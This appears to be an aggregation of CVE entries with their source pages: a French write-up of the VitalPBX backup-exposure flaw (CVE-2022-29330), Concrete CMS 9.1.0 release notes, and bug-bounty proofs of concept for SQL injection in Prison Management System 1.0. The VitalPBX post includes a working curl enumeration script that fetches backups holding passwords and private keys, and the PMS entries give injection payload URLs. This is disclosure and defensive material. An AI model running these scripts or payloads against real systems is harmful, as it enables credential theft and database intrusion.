IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.

Alors que nous jouions avec configurions notre VitalPBX tranquillement, nous avons découvert une vulnérabilité relativement facile à mettre en œuvre et donnant accès à des données qu’on ne devrait pas pouvoir lire librement (_i.e._ les mot de passe des extensions, mais pas que). Voici comment elle fonctionne... et pourquoi vous devriez mettre votre version à jours.

Inutile pour une famille, donc indispensable pour une famille geek, nous avons un IPBX à la maison. Parmi les nombreux logiciels sur le marché, nous avons installé un VitalPBX dans une machine virtuelle connectée au reste de notre réseau et qui fait le lien entre nos téléphones IP (des IP-8815) et nos lignes externes analogiques (via une passerelle HX4G connectée aux boxes des FAI).

Au fil de nos aventures dans ce monde merveilleux de la VoIP, nous avons expérimenté plein d’astuces qui nous permettent d’avoir, @home, toutes les fonctionnalités qu’on attend d’un système téléphonique d’entreprise (ou d’hôtel) : groupe de sonnerie, messagerie vocale et test de turing (pour éviter les robots d’appel)...

© Rodrigo SalomonHC @ pixabay

Dernière en date : la sauvegarde (parce que les sauvegardes, c’est important). C’est vrai que vu notre infrastructure, ce serveur est rapide à installer et les rares données qu’il contient peuvent être perdues, on aurait donc pu faire l’impasse. Le truc, c’est qu’en tant qu’experts judiciaire, on ne se voit pas intervenir pour des juges et des entreprises sans savoir de quoi on parle (et aussi parce qu’au fond, configurer des serveurs, on aime ça).

Et c’est justement en cherchant à configurer le système de sauvegarde, ou plutôt à l’automatiser, que nous avons découvert cette vulnérabilité...

Les fichiers de sauvegardes étaient accessibles via l’interface web sans aucune restriction et donnent accès, en clair, aux mots de passe aux clés cryptographiques et aux boites vocales (entre autre). Heureusement, c’est corrigé depuis le 4 mai (version 3.2.1) donc mettez votre système à jours.

**La sauvegarde chez VitalPBX**

La configuration des sauvegardes de VitalPBX se fait via l’interface d’administration web. Une fois connecté, vous devez vous rendre dans « admin / Tools / Backup & Restore ». Le formulaire présenté par défaut permet de créer un nouveau profil de sauvegarde, avec au minimum, un nom.

Créer un profil de sauvegarde

Une fois vos profils de sauvegarde créés, vous pouvez les lister via l’icone de menu () puis y accéder en cliquant sur leur nom. Le nouvel écran reprend le formulaire de configuration et ajoute la liste des sauvegardes déjà effectuée (dans la limite configurée plus haut), vous permet d’en restauter une (bouton  à droite dans la ligne correspondante) et de créer de nouveaux points de sauvegarde (bouton  en bas à gauche de l’écran).

Détail d’un profil de sauvegarde

Si vous voulez faire des sauvegardes automatiquement, il faut d’abord ajouter un profile de tâche automatique (via le menu « PBX / Tools / cron profiles ») car tant qu’il n’y en a pas, le champ _Run automatically_ ne poropose que la valeure disabled).

**Vulnérabilités des fichiers de sauvegardes**

Comme vous l’aviez peut être vu, l’interface web propose aussi un bouton  pour télécharger un point de sauvegarde. En cliquant dessus, vous obtiendrez alors une archive au format tar que vous pourriez sauvegarder de votre côté. Ce n’est pas évident parce qu’il nous cache les détails (il est opaque) mais ce bouton ne fait que rediriger votre navigateur vers l’adresse du fichier qui pourrait ressembler à ce qui suit :

    https://monipbx.monreseau.lan/static/backup/c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Ça n’a l’air de rien vu comme ça mais en vérifiant les détails, vous allez voir que ça va poser problème.

**Téléchargement sans contrôle d’accès**

La configuration du serveur web se trouve, comme toujours sur les _Red Hat_, dans /etc/httpd/conf.d/ et plus particulièrement, le fichier vitalpbx.conf. On y trouve la configuration des vhosts (serveurs web virtuels) utilisés par vitalpbx, dont celui de l’interface d’administration web qui nous intéresse et dont voici un extrait :

    <VirtualHost *:443>
            ...
            <Directory "/var/lib/vitalpbx/static">
                    Require all granted
            </Directory>
            Alias /static "/var/lib/vitalpbx/static"
            ...
    </VirtualHost>

Si on le lit du bas en haut, on apprend que le préfixe /static dans l’adresse est en fait un alias qui correspond au répertoire /var/lib/vitalpbx/static. Puis (ou plutôt _avant_) que ce répertoire est en libre accès (Require all granted). Aucun code PHP, aucune ligne de configuration ou fichier .htaccess ne viendra tempérer cette absence de contrôle d’accès.

Si on connait l’adresse d’un fichier, on peut y accéder sans contrainte.

Seule consolation, le serveur ne permet pas de lister les fichiers dans un répertoire ; si vous accédez à https://monipbx.monreseau.lan/static/backup/, le système vous retournera une erreur _403 - Forbidden_ (vous n’avez pas le droit de voir le contenu du répertoire).

**Adresse déterministe**

Il faut donc deviner le reste de l’adresse des fichiers de sauvegarde...

    c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

*   **c4ca4238a0b923820dcc509a6f75849b**, est facile à trouver, il suffirait de la coller dans n’importe quel moteur de recherche pour découvrir qu’il s’agit du MD5 de la chaîne « 1 » (l’identifiant du profil de sauvegarde). En faisant le test avec de nouveaux profiles on obtiens, à chaque fois, le MD5 de leur identifiant, c81e728d9d4c2f636f067f89cc14862c pour 2, puis eccbc87e4b5ce2fe28308fd9f2a7baf3 pour 3, et ainsi de suite.
    
*   **1650260415** est plus subtile (les moteurs de recherche ne vous aideront pas) mais ce n’est que le timestamp du fichier ; soit le nombre de secondes écoulées depuis le 1^er^ janvier 1970 lorsque le fichier a été écrit sur le disque...
    

Tout ce qu’il faut, c’est trouver un identifiant de profil et un timestamp valide, deux informations dont les valeurs suivent des suites toutes simples.

On peut énumérer les profiles (nombres entiers consécutifs) et les timestamps (à rebours à partir de _maintenant_) jusqu’à trouver un fichier de sauvegarde.

**L’exploitation**

Plutôt que tester ces possibilités à la main, on peut automatiser tout ça. Voici une solution en bash 😉. Pour faire court, on teste tous les timestamps sur les dernières 24 heures, pour les 10 premiers profiles. Et on quitte le script dès que curl a trouvé quelque chose.

    #!/bin/bash
    
    now=$(date +%s)
    past=$(date -d "1 day ago" +%s)
    
    for profile in $(seq 1 10) ; do
        md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
    
        curl -sk "https://localhost/static/backup/$md5/" -o /dev/null -w "%{http_code}" | grep -q "404" && continue
    
        for timestamp in $(seq $now -1 $past) ; do
            curl -fJOsk "https://monipbx.monreseau.lan/static/backup/$md5/vitalpbx-$timestamp.tar" && exit 1
        done
    done

Si vous êtes pressé, on peut accélérer tout ça avec un peu de parallélisme sur les appels à curl. Pour ça, on va modifier la boucle intérieure et directement passer le résultat de seq à xargs.

        export md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
        ...
        seq $now -1 $past | xargs -P 10 -I % bash -c \
            'curl -fJOsk "https://localhost/static/backup/$md5/vitalpbx-%.tar" && exit 255' \
            || exit 1

**Impact**

Le fichier de sauvegarde est une archive tar contenant d’autres archives (gz et tar.gz). Et parmi tout ce qui est sauvegardé, quelques éléments sont particulièrement intéressant...

*   **asterisk.sql.gz** contient, entre autre, la configuration de certaines extensions PJSIP et leurs identifiants (logins et mots de passe en clair),
*   **dialplan.tar.gz** contient, entre autre, la configuration des extensions SIP (dans sip__50-1-extensions.conf) et PJSIP (dans pjsip__50-1-extensions.conf), dont les identifiants (logins et mots de passe en clair),
*   **certificates.tar.gz** contient les certificats TLS ainsi que leur clé privée correspondante,
*   **voicemail.tar.gz**, comme son nom l’indique, contient les boites vocales, c’est à dire les messages audio que les correspondants ont laissé.

Donc, si quelqu’un a la main sur votre fichier de sauvegarde, il peut :

*   **Usurper les extensions** auprès du serveur de VoIP, et lire les messages vocaux laissés par les correspondants,
*   **Usurper le serveur** de configuration (_e.g._ avec un proxy HTTPS) et ensuite récupérer les mots de passe des administrateurs.

Et une fois qu'on a le mot de passe de l'administrateur, on peut tout faire.

**Correction**

_Telesoft S.A_ a corrigé cette vulnérabilité dans la version 3.2.1, une fois mis à jours, votre serveur n’est donc plus vulnérable à cette attaque 🎉.

Dans le détail, les fichiers de sauvegardes ne sont plus accessible directement (ils sont déplacés dans /var/lib/vitalpbx/backup, en dehors des répertoires accessibles par apache) et nécessitent donc passer par l’interface utilisateur en PHP qui fait les vérifications d’authentification.

Pour savoir si votre installation a été victime de cette attaque, vous pouvez regarder les journaux du serveur web. Ils se trouvent dans /var/log/httpd, une recherche sur /static/backup vous dira si des accès ont eu lieu. Si vous constatez des accès, et si vous voulez rester prudent, changez vos clés TLS et les mots de passe (extensions et pour être prudent, utilisateurs).

**Historique de publication**

*   **Découverte de la vulnérabilité :** 1er avril 2022,
*   **Communication à l’éditeur :** 1er avril 2022,
*   **Correctif de sécurité :** 4 mai 2022 (version 3.2.1 R1).

CVE-2022-29330: CVE-2022-29330 - Vulnérabilité dans VitalPBX < 3.2.1

XSS in /dashboard/blocks/stacks/view_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are outputted can be exploited for Concrete 8.5.7 and below as well as Concrete 9.0 through 9.0.2 to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 3.1with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting

**New Features**

*   Improved appearance and functionality when editing block, area, layout and container styles inline in the page (thanks deek87)
*   Added the ability for an Express attribute to be marked as unique, provided its attribute type supports it. Unique attributes will be useful for SKUs, enforcing email uniqueness, etc…
*   Much improved version comparison feature that can compare the HTML of two page versions and highlight differences (thanks deek87 and hissy)
*   Feature Link block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Hero Image block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Added new Security Policy page in the Dashboard (thanks hissy)
*   Added a “Revert to Draft” command button on published pages in the Composer interface (thanks hissy)
*   Improvements and refinements to Dashboard file details screen in desktop and mobile views.
*   Added the ability to move a file folder in the Dashboard file manager.
*   Added the tree view back to the Groups Dashboard page.
*   Add title field for YouTube and Video block types for better accessibility (thanks Mesuva)

**Behavioral Improvements**

*   Express attributes no longer need to be unique across all Express objects. Instead attribute handles can be reused provided they’re not reused within the same object.
*   New Express forms will be created when Express Form blocks that have been copied are edited in their new locations (thanks Xanweb)
*   File chooser has improved view and functionality; bug fixes; adding width, height and size to list and grid view; adding detail image callout on hover.
*   Task Options in the Dashboard have have been moved into a modal dialog when present, so they’re harder to miss (thanks deek87)
*   Express entity attribute handles now can be reused as long as they’re not reused within the same Express object.
*   You can now click on the entire row of a Dashboard results table (like the page search, file manager, etc…) and go to the detail URL.
*   Better display of inline floating commands for things like containers and block move.
*   We now show the container name when hovering over containers in edit mode.
*   Reinstated CSS and JavaScript asset post-processing cache setting; restructured the Dashboard Cache Settings page for better grouping of functionality and explanation.
*   Improve display of Recaptcha settings page.
*   Appearance improvements to Waiting for Me and the Dashboard desktop.
*   Active classes for pages added to the output of the Top Navigation Bar block (thanks danklassen)
*   Locale home page is now undeleteable when using multilingual sites.
*   Miscellaneous performance improvements for logged-in users (thanks hissy)
*   Added rate limiting to Forgot Password using the built-in IP Allowlist/Denylist functionality
*   Better usage of meta canonical tag in page under certain circumstances (thanks hissy)
*   File folders now cannot be deleted if they have sub-folders or sub-files in them.
*   Display improvements to inline style dropdown (no more too-dark panels with no contrast.)
*   Better automatic display of the “Approve Stack” button when editing block parameters, styles and permissions in the stacks Dashboard page.
*   Don’t allow users to delete site types until they have removed all sites of that type.
*   Improvements when Concrete is installed in a subdirectory instead of the root directory of a website.
*   Added the ability to view a user’s public profile from their Dashboard user details page.
*   Added --session-handler to the console install utility. Set to database if you’d like to override the default file-based sessions.
*   Gotten rid of the behavior where certain dynamic trees cause pages to scroll to them on load (visible on Express Object details edit, adding groups, using the Groups selector in custom Dashboard pages, and more)
*   JavaScript and CSS assets now have the timestamp of when the cache was last cleared appended to them (thanks deek87, haeflimi)
*   Added the link back to the “Data Objects” Express management interface from the header of that Express objects results page.
*   Added URL Path as a column that can be added to the Page Search interface.
*   Fixed: Login page forces gray background on custom themes
*   Fixed: Scheduled page publishing doesn't purge the page cache (thanks hissy)
*   Added more caching to certain objects to improve performance (thanks hissy)
*   Pre-selected File Storage Location For Nested Folder

**Bug Fixes**

*   Much improved PHP 8 compatibility fixes for all core block types (thanks deek87)
*   Fixed user permissions for searching users with non super admin not working in sites upgraded from 8.5 until permissions were reset.
*   Fixed inability to assign groups, users, group sets or group combinations to group permissions when updating from 8.5.
*   Improvements to core libraries to allow for installation on PHP 8.1 w/Composer.
*   PHP 8 compatibility fixes for Calendar (thanks deek87)
*   Fixed: Database Character Set is no longer showing current character set.
*   Fixed: Missing font selection for body font in Atomik customizer when using Default skin.
*   Fixed: Batch Task with empty batch does not finish running
*   Fix Top Navigation Bar block 'include sticky nav' setting not set appropriately when editing the block
*   Fixed inability to drag an individual block out of the stacks panel in a page.
*   Fixed: Document Library advanced search fields do not display
*   Fixed “Express form error dirty entity” error that users might see when creating forms on the front-end.
*   Fixed bug where attribute data validation routines weren’t being run when updating certain objects and certain objects in bulk.
*   Fixed: Express Calendar and Calendar Event Attributes Not Correctly Implemented
*   Fixed: "Added to Page" File search filter doesn't work
*   Fixed: Schedule Guest Access doesn't work (thanks HamedDarragi)
*   Fixed: Page Search in chooser dialog doesn’t work (thanks HamedDarragi)
*   Fixed: The multilingual panel/page relations panel didn’t allow you to create pages in the multilingual trees from the related page - and it used to.
*   Fixed strange appearance in Dashboard sitemap selector when using multisite and multiple locales.
*   Fixed bugs with using custom file attributes with the Document Library block.
*   Fixed theme customizer not working on legacy LESS-based themes when being used with a large number of LESS variables.
*   Fixed inability to see sort icons on attributes in the Dashboard.
*   Fix Auto-Nav showing duplicate tabs in themes based on Bootstrap 3 (thanks lvanstrijland)
*   Fixed: When using more than one user search criteria by group, one to include groups and one to exclude groups, we get the wrong results (thanks mnakalay)
*   Fixed: Accordion block doesn't load required assets when not using BS5 based theme.
*   Fixed Error when try to edit 'express details block' (thanks Ruud-Zuiderlicht)
*   Fixed edit page type basic details error on PHP 8.
*   Tooltips now work properly again in Composer interface (thanks danklassen)
*   Fixed inability to create and update skins for themes that had a large number of parameters under certain conditions.
*   Fixed errors that would occur when creating a site, enabling multilingual, setting a new source locale, and deleting the original default locale.
*   Fixed: User activation workflow, Activate action not working
*   Fixed: 9.0.2 Seo Bulk Updater for multilingual site not showing results when selecting All Levels (thanks danklassen)
*   Fixed: Placing a Sticky "Top Navigation Bar" in Global "Navigation" using Atomik blocks editing of page
*   Fixed: Topics Attribute Search Form is not getting translated on Frontend (thanks 1stthomas)
*   Re-enabled the ability to edit a user’s avatar from their Dashboard details page.
*   Fixed: Clipboard - Unable to remove broken clipboard entries/clipboard doesnt remove deleted blocks
*   Fixed: When placing a stack, the edit mode menu is not displayed
*   Fixed: Adding Options To Option List Page Attribute Undefined Array Key under PHP 8
*   Fixed: Multilingual copy site tree with alias pages (thanks hissy)
*   Fixed: v9 Elemental Block Edit Nav Tabs Broken (thanks ccmEnlil)
*   Fixed: Error in updating package from marketplace incorrectly displaying itself under certain conditions (thanks JohnTheFish)
*   Fixed: Accordion block editing interface rich text editor doesn’t have access to Concrete-specific features like file manager, sitemap, etc…
*   Fixes ErrorException - Undefined property: Concrete\\Core\\Permission\\Access\\Entity\\GroupCombinationEntity::$label under PHP 8 (thanks 1stthomas)
*   Legacy form's "reply to this email address" checked state was not properly passed (thanks katzueno)
*   Fixed errors with the legacy form (thanks mlocati)
*   Fixed: Updating an express form handle can result in a table name that is too long for mysql
*   Fix several user search fields not retaining their selected values (thanks mnakalay)
*   Fixed: install with Elemental full fails due to undefined array key "titleFormat" under PHP 8
*   Fix YouTube block responsive size class issue (thanks katalysis)
*   Fixed Marketplace dashboard page broken under PHP 8
*   Conversation rating stars now appear properly (thanks deek87)
*   Fixed inability to remove an entry from the trash when that entry is an alias to an external link (thanks Ruud-Zuiderlicht)
*   Fixed bug where core “Parallax Image” area custom template (deprecated) now works again
*   Fix a bug with having multiple image blocks with on-hover attribute set on the page didn’t work reliably (thanks evgk)
*   Fixed: Toolbar title styling interfering with intelligent search results in accessibility mode (thanks Mesuva)
*   Fixed: Switch Language block default view does not work
*   Fixed inability to use the “Express Entry Selector Multiple” form control type.
*   \[V9 RC\]Fixed cookie not being cleared properly to open "add block panel" when using the sticky add panel and installing Concrete in a sub-directory
*   Fixed: Position of the reCAPTCHA badge not shown correctly after saving
*   Fixed errors in waiting for me when groups or users were deleted.
*   Fix inability to set storage location from file details Dashboard page.
*   Fixed bugs with thumbnails on alternate storage locations (thanks mnakalay)
*   Fixed: concrete.debug.hide\_keys' not working on Globals do to commented Code
*   Fix IpAccessControlService check against specific access control category (thanks mlocati)
*   Access Control: fix sorting categories in the dashboard page (thanks mlocati)
*   Fixed bug: When there's no time window, we currently ban IP addresses forever, even if we configure Concrete to only ban for X seconds. (thanks mlocati)
*   Fixed bug: "Illegal mix of collations" when running reindex task when running under certain database conditions.
*   Added “snippet.png” back into rich text editor so you can see that button.
*   Fixed: Removing Author User From Page Attributes & Saving Throws Error
*   Fixed: Deleting Containers throws Access Denied error under certain in-page editing conditions.
*   Fixed: Rich Text Page Attribute Composer "Source" Editing Hindered By Composer Autosave
*   Fixed a bug in image processing (Imagine Library) that could lead to segmentation faults under certain conditions (thanks mlocati)
*   Fixed: PlaceholderService error in thumbnail overview (thanks haeflimi)
*   Fixed: Deleting Containers shows multiple delete modal windows under certain in-page editing conditions.
*   Fixed: Top navigation block always loads the default site tree even in multilingual sites (thanks danklassen)
*   Fixed inability to override session handler to database in config prior to installation and then install successfully.
*   Fix missing none option in attribute display block (thanks JohnTheFish)
*   Fixed: Stacks with no approved versions do not appear in stacks list

**Backward Compatibility Notes**

*   The Concrete\Core\Express\Form\Validator\Routine\RoutineInterface class and all classes that implement it has changed. The validate method now takes a nullable third parameter for the Concrete\Core\Entity\Express\Entry object that may or may not exist. This replaces the request type attribute. The request type can now be inferred - if the entry does not exist, we assume this to be an ADD operation. If the entry exists within the validate method, you are running an UPDATE operation.
*   Block::duplicate() has changed its secondary parameter from $isCopiedWhenPropagated to $controllerMethodToTryAndRun. This lets us choose duplicate_master or the new duplicate_clipboard in certain situations. It is very unlikely that this should impact any custom code you have written as this is pretty deep in the Concrete internals.
*   If you have customized the Document Library view template, please ensure that your <form> tag has a valid input button with the name ”search”. This is checked in the controller in order to ensure searching is actually occurring. If you want to search by advanced file attributes, you’ll need this to be in place or else the Document Library controller will not check for attribute searching.

**Developer Updates**

*   Added on_page_version_delete event (thanks hathawayweb)
*   Mail Importer code running on ancient Zend Mail code updated to PHP 7+ (thanks KevinBLT)
*   Patches to third party libraries to allow for installation on PHP 8.1 w/Composer (thanks mlocati)
*   htmlawed HTML sanitization library updated for better compatibility with HTML5.
*   IP Access Control: add IpAccessControlCategory::describeTimeWindow() (thanks mlocati)
*   Allow Date service class to work with DateTimeImmutable objects (thanks mlocati)
*   Improvements and bug fixes to route building and controller syntax (thanks mlocati)
*   More reliable running of on\_start() in block controllers before page contents are rendered (thanks hissy)
*   Moved concrete5/dependency-patches to the core composer.json instead of the separate composer project (thanks mlocati)
*   Improved code commenting throughout all core blocks (thanks deek87)
*   Fix list\_syntax rule of PHP-CS-Fixer (thanks mlocati)
*   Significant list of third party PHP script minor updates.
*   Simplify c5:exec return code (thanks mlocati)
*   Fixed: Task scheduling command is incorrect on dashboard page and in documentation, needs more detail
*   Concrete\Core\Http\ResponseFactory used to take $session as its first constructor dependency, even though that was not used. This caused problems in the event response factory was used prior to sessions being available or being configured for database sessions that were not yet installed. This parameter has been removed. If you use the $app->make() method of building this class, you should not be affected.
*   Now using https:// for communication with the Concrete marketplace even when the user’s site is not https://

**Security Fixes**

*   Fixed several places where we weren’t sanitizing file names in the file manager and stacks page.
*   Remediated CVE-2022-21829 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can download zip files over HTTP and execute code from those zip files which could lead to an RCE. Fixed by enforcing ‘concrete\_secure’ instead of ‘concrete’. Concrete now only makes requests over https even if a request comes in via http. Concrete CMS security team ranked this 8 with CVSS v3.1 vector: AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H Credit goes to Anna for reporting on HackerOne - https://hackerone.com/reports/1482520
*   Remediated CVE-2022-30117 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below allowed traversal in /index.php/ccm/system/file/upload which could result in an Arbitrary File Delete exploit. This was remediated by sanitizing /index.php/ccm/system/file/upload to ensure Concrete doesn’t allow traversal and by changing isFullChunkFilePresent to have an early false return when input doesn't match expectations.Concrete CMS Security team ranked this 5.8 with CVSS v3.1 vector AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H. Credit to Siebene for reporting https://hackerone.com/reports/1482280
*   Remediated CVE-2022-30120 - XSS in /dashboard/blocks/stacks/view\_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Dashboard Stacks page sort URLs are now sanitized. Concrete CMS Security team ranked this vulnerability 3.1 with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting https://hackerone.com/reports/1363598
*   Remediated CVE-2022-30119 - XSS in /dashboard/reports/logs/view - old browsers only. When using Internet Explorer with the XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Thanks zeroinside for reporting https://hackerone.com/reports/1370054
*   Remediated CVE-2022-30118 - XSS in /dashboard/system/express/entities/forms/save\_control/\[GUID\]: \\ old browsers only. When using Internet Explorer with the XSS protection disabled, editing a form control in an express entities form for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Thanks zeroinside for reporting https://hackerone.com/reports/1370054

CVE-2022-30120: 9.1.0 Release Notes :: Concrete CMS

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/prisons/view_prison.php:4

**CVE-2022-32405****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/prisons/view_prison.php:4

$qry = $conn\->query("SELECT \* from \`prison\_list\` where id = '{$\_GET\['id'\]}' and delete\_flag = 0 ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='wrong',0,1)%23

CVE-2022-32405: BugBounty/cve-2022-32405.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_inmate.php:3

**CVE-2022-32404****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_inmate.php:3

$qry = $conn\->query("SELECT \* from \`inmate\_list\` where id = '{$\_GET\['id'\]}' ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='wrong',0,1)%23

CVE-2022-32404: BugBounty/cve-2022-32404.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_record.php:4

Submitted by oretnom23 on Tuesday, May 31, 2022 - 15:52.

****Introduction****

This project is entitled **Prison Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. The main purpose of this project is to provide an online and automated platform for the **Prison** to manage the inmates' records and daily visitors. This project has a pleasant user interface with the help of **Bootstrap Framework** and **AdminLTE Template**. It also consists of user-friendly features and functionalities.

****About the Prison Management System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Prison Management System** is only accessible to the Prison's Management. The system has 2 types of user roles which are the **Administrator** and **Staff**. The application requires the management to log in with their valid credentials to gain access to the features and functionalities. This project sores and manages the convicted persons' records. It stores the convict's personal information, case information, and records inside the prison. This application stores the visitor details when visiting the inmates. Management can update the inmate visitor privilege. The **Prison Management System** also generates printable Monthly Reports of **Records History** and **Visitor Records**.

****Features****

*   **Home Page**
    *   Display the summary.
*   **Prison Management**
    *   Add New Prison
    *   List All Prisons
    *   Edit/Update Prison Details
    *   View Prison Details
    *   Delete Prison
*   **Cell Block Management**
    *   Add New Cell Block
    *   List All Cell Blocks
    *   Edit/Update Cell Block Details
    *   View Cell Block Details
    *   Delete Cell Block
*   **Action Management**
    *   Add New Action
    *   List All Actions
    *   Edit/Update Action Details
    *   View Action Details
    *   Delete Action
*   **Crime Management**
    *   Add New Crime
    *   List All Crimes
    *   Edit/Update Crime Details
    *   View Crime Details
    *   Delete Crime
*   **Inmate Management**
    *   Add New Inmate
    *   List All Inmate
    *   View Inmate Details
    *   Edit Inmate Details
    *   Update Inmate Visitor Privilege
    *   Print Inmate Details
    *   Add Record
    *   List All Records
    *   Delete Record
*   **Visitor Management**
    *   Add New Visitor Details
    *   List All Visitor Details
    *   Edit Visitor Details
    *   View Visitor Details
    *   Delete Visitor Details
*   **Generate Printable Reports**
    *   Monthly Inmate Record
    *   Monthly Visitor Records
*   **User Management**
    *   Add New User
    *   List All Users
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots******Dashboard Page****

****Inmate Details****

****Inmate Details - Print View****

****Monthly Inmate Records Report****

****Monthly Visitor Records Report****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****pms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****pms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Prison Management System** in a **browser**. i.e. ****http://localhost/pms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Prison Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1349 views

CVE-2022-32403: Prison Management System in PHP/OOP Free Source Code

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_privilege.php:4

**CVE-2022-32401****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_privilege.php:4

$qry = $conn\->query("SELECT \* FROM \`inmate\_list\` where id = '{$\_GET\['id'\]}'");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='wrong',0,1)%23

CVE-2022-32401: BugBounty/cve-2022-32401.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/user/manage_user.php:4.

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/user/manage_user.php:4

